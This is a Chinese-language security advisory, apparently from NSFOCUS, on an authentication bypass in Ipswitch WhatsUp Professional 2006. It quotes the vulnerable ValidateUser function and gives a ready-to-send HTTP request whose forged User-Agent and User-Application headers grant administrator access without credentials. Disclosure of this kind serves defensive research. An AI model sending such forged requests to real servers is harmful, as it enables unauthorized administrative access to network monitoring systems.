首页 -> 安全研究

安全研究

安全漏洞
Ipswitch WhatsUp Professional 2006认证绕过漏洞

发布日期:2006-05-17
更新日期:2006-05-17

受影响系统:
Ipswitch WhatsUp Professional 2006
描述:
BUGTRAQ  ID: 18019

Whatsup Professional软件是Ipswitch公司开发的监视TCP/IP、NetBEUI和IPX网络状态的工具。

What's Up Professional 2006存在绕过认证漏洞,攻击者就可以绕过认证机制无需凭据便可登录。

攻击者可以通过发送有特制首部的HTTP请求诱骗应用程序相信请求来自控制台,而控制台是可信任的。

--------------------------------
有漏洞函数的位置:
--------------------------------
NmConsole\StandardIncludes\ApplicationContext.inc

--------------------
有漏洞函数:
--------------------

/*****************************************************
* USER FUNCTIONS
**/
ApplicationContext.prototype.ValidateUser = function()
{
var sScriptName = Request.ServerVariables("SCRIPT_NAME") + "";
if(this.DoesExist(this.nWebUserID)
|| sScriptName.indexOf("Login.asp") > -1
) return true;
if((Request.ServerVariables("HTTP_User-Application") == "WebArchive"
|| Request.ServerVariables("HTTP_User-Application") == "NmConsole")
&& Request.ServerVariables("HTTP_User-Agent") == "Ipswitch/1.0"
)
{
nUserRightsMask = this.GetUserRightBit("Access Group and Device Reports");
nUserRightsMask += this.GetUserRightBit("Access System Reports");
if(Request.ServerVariables("HTTP_User-Application") == "NmConsole")
{
nUserRightsMask += this.GetUserRightBit("Manage Devices");
this.bInConsole = true;
Session("bInConsole") = true;
}
//
//If you are coming from the Console/RR Reports, you should be able to access everything.
//
this.SetUser( this.ADMIN_USER_ID , "NmConsole", nUserRightsMask, 0);
return true;
}
sRedirectURL = Request.ServerVariables("SCRIPT_NAME") + "?" + Request.QueryString;
if(!this.DoesExist(Session("sRedirectURL")) || Session("sRedirectURL") == "")
{
if(sRedirectURL.indexOf("RestrictedAccess") == -1)
Session("sRedirectURL") = sRedirectURL;
}
if(Response.Buffer == false)
Response.Buffer = true;
Response.Redirect("/NmConsole/Login.asp");
Response.End();
};

<*来源:Kenneth F. Belva (ken@ftusecurity.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114789105503836&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

GET http://[server]/NmConsole/Default.asp?bIsJavaScriptDisabled=false HTTP/1.1
Host: [server]
User-Agent: Ipswitch/1.0
User-Application: NmConsole
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://[server]/

建议:
厂商补丁:

Ipswitch
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ipswitch.com/

浏览次数:3460
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障